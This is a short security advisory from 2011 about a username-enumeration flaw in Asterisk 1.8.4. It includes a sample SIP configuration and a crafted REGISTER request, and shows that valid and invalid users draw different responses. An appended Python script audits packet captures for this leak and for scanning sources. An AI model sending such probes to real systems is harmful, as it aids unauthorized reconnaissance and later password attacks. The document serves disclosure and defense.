Asterisk: SIP responses permit username identification through use of REGISTER
Author: francesco.tornieri "At" verona-wireless.net
Summary: SIP responses permit user identification
Release Date: 25/05/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.4 (I tried it against Asterisk 1.6.2.16.2, but it generates a timeout)
Description:
It is possible to enumerate valid SIP usernames through use of the REGISTER method (a similar problem was fixed by Digium in 2009 and is described in this document: http://downloads.asterisk.org/pub/security/AST-2009-003.html).
Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=192.168.2.1
realm=asterisk
allowguest=no
alwaysauthreject=yes ; <----
[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729
[100](template)
callerid=phone100<100>
username=100
secret=password
[500](template)
callerid=phone200<500>
username=500
secret=password
------------------------
Crafted SIP REGISTER example
------------------------
REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:[email protected]>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:[email protected]>
Refer-To: sip:[email protected]
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
----------------
Method: REGISTER
----------------
Valid user (user 500)
Response:
---
Received: SIP/2.0 401 Unauthorized
---
Invalid user (user 501)
Response:
---
Received: SIP/2.0 100 Trying
---
Francesco Tornieri
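
An added example, not part of the original advisory: a Python check a defender can run over captured REGISTER request/response pairs to see whether different usernames drew different status codes (the leak shown above) and which sources tried several usernames. The capture tuples, source addresses, user 502, the `min_users` threshold and all function names are constructed assumptions; only the two status lines come from the advisory.

```python
import re
from collections import defaultdict

# Constructed sample: (source IP, REGISTER request, first response seen).
# Only the two status lines come from the advisory; the rest is made up.
def _register(user):
    return (f"REGISTER sip:192.168.2.1 SIP/2.0\r\n"
            f"To: <sip:{user}@192.168.2.1>\r\n"
            f"CSeq: 123 REGISTER\r\n\r\n")

CAPTURE = [
    ("192.168.2.50", _register("500"), "SIP/2.0 401 Unauthorized\r\n\r\n"),
    ("192.168.2.50", _register("501"), "SIP/2.0 100 Trying\r\n\r\n"),
    ("192.168.2.50", _register("502"), "SIP/2.0 100 Trying\r\n\r\n"),
    ("192.168.2.77", _register("100"), "SIP/2.0 401 Unauthorized\r\n\r\n"),
]

# User part of the To URI; accepts the compact header name "t" as well.
TO_USER = re.compile(r"^(?:To|t)\s*:.*?<?sips?:([^@>;\s]+)@", re.I | re.M)
STATUS = re.compile(r"^SIP/2\.0 (\d{3})")

def register_target(request):
    """Return the user part of the To URI of a REGISTER, else None."""
    if not request.startswith("REGISTER "):
        return None
    m = TO_USER.search(request)
    return m.group(1) if m else None

def audit(capture, min_users=3):
    """Group response codes by probed user and count users per source.

    Returns (oracle, scanners): oracle maps status code -> sorted users when
    different users drew different codes; scanners lists the sources that
    tried at least `min_users` distinct usernames.
    """
    by_code, by_src = defaultdict(set), defaultdict(set)
    for src, request, response in capture:
        user, status = register_target(request), STATUS.match(response)
        if user is None or status is None:
            continue  # not a REGISTER, or not a parsable SIP response
        by_code[int(status.group(1))].add(user)
        by_src[src].add(user)
    oracle = {c: sorted(u) for c, u in by_code.items()} if len(by_code) > 1 else {}
    scanners = sorted(s for s, u in by_src.items() if len(u) >= min_users)
    return oracle, scanners

if __name__ == "__main__":
    print(audit(CAPTURE))
```

An empty `oracle` means every probed username drew the same status code, which is the behaviour `alwaysauthreject=yes` is meant to give.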